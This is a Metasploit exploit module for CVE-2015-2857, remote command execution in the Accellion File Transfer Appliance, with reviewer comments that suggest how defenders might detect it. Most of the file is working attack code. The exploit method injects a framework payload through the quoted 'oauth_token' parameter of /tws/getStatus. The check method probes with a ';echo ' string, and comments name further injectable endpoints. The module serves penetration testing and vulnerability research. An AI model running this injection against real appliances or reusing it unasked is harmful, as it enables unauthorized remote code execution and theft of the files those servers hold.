Path: blob/master/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb
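##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2015-2857 (R7-2015-08) in the Accellion File
# Transfer Appliance.
#
# Reviewer notes for defenders, all taken from this module's own metadata:
#   * Root cause: a user-supplied 'oauth_token' reaches a system() call inside
#     a mod_perl handler without shell metacharacters being neutralised.
#   * Confirmed on FTA_9_11_200; fixed in software update FTA_9_11_210.
#   * Handlers named as affected: /tws/getStatus, /seos/find.api,
#     /seos/put.api and /seos/mput.api.
#   * Detection idea: POST requests to those handlers whose 'oauth_token'
#     contains a single quote or a semicolon. Legitimate tokens presumably
#     never contain them (the appliance's error text refers to an MD5 token),
#     but confirm against real traffic before alerting on it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the default connection options
  # (port 443 with SSL enabled).
  #
  # @param info [Hash] metadata overrides supplied by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',
        'Description' => %q{
          This module exploits a metacharacter shell injection vulnerability in the Accellion
          File Transfer appliance. This vulnerability is triggered when a user-provided
          'oauth_token' is passed into a system() call within a mod_perl handler. This
          module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
          '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
          version FTA_9_11_200, but may apply to previous versions as well. This issue was
          fixed in software update FTA_9_11_210.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'http://r-7.co/R7-2015-08'],
          ['CVE', '2015-2857']
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-07-10',
        # NOTE(review): reliability, stability and side effects are still
        # undeclared; fill these in once they have been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true])
      ]
    )
  end

  # Probes '/tws/getStatus' twice to decide whether the handler still passes
  # 'oauth_token' to a shell.
  #
  # The first request sends a plainly invalid token and expects the
  # appliance's "MD5 token is invalid" message. The second sends a token that
  # only closes the surrounding quote and appends an `echo`; a "Success"
  # reply is treated as proof that the token was interpreted by the shell.
  #
  # A missing reply is reported as Unknown rather than Safe: an unreachable
  # or timed-out host has not been shown to be patched, and reporting Safe
  # would give false assurance to anyone using this check to verify
  # remediation.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the target does not answer,
  #   Safe when it answers without the expected markers, Vulnerable otherwise
  def check
    uri = '/tws/getStatus'

    res = post_oauth_token(uri, 'invalid')
    return Msf::Exploit::CheckCode::Unknown unless res

    unless res.code == 200 && res.body.to_s.match?(/"result_msg":"MD5 token is invalid"/)
      return Msf::Exploit::CheckCode::Safe
    end

    res = post_oauth_token(uri, "';echo '")
    return Msf::Exploit::CheckCode::Unknown unless res

    unless res.code == 200 && res.body.to_s.match?(/"result_msg":"Success","transaction_id":"/)
      return Msf::Exploit::CheckCode::Safe
    end

    Msf::Exploit::CheckCode::Vulnerable
  end

  # Sends the selected payload inside 'oauth_token' and then hands control to
  # the framework's payload handler. An unexpected or missing reply is only
  # logged; the handler is still started, as in the original flow.
  def exploit
    # The appliance interpolates the token into the following command line:
    # `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
    token = "';#{payload.encoded};echo '"

    uri = '/tws/getStatus'

    # Other exploitable URLs:
    # * /seos/find.api (works with no other changes to this module)
    # * /seos/put.api (requires some hoop jumping, upload)
    # * /seos/mput.api (requires some hoop jumping, token && upload)

    print_status("Sending request for #{uri}...")
    res = post_oauth_token(uri, token)

    if res && res.code == 200 && res.body.to_s.match?(/"result_msg":"Success","transaction_id":"/)
      print_status("Valid response received...")
    elsif res
      print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
    else
      print_error("No reply received from the target")
    end

    handler
  end

  # POSTs a random 'transaction_id' together with the given 'oauth_token' to
  # +uri+. Shared by #check and #exploit so the three requests stay identical.
  #
  # @param uri [String] handler path on the appliance
  # @param token [String] value submitted as 'oauth_token'
  # @return [Object, nil] whatever send_request_cgi returns; callers treat a
  #   nil result as "no reply"
  def post_oauth_token(uri, token)
    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'transaction_id' => rand(0x100000000),
        'oauth_token' => token
      }
    })
  end
end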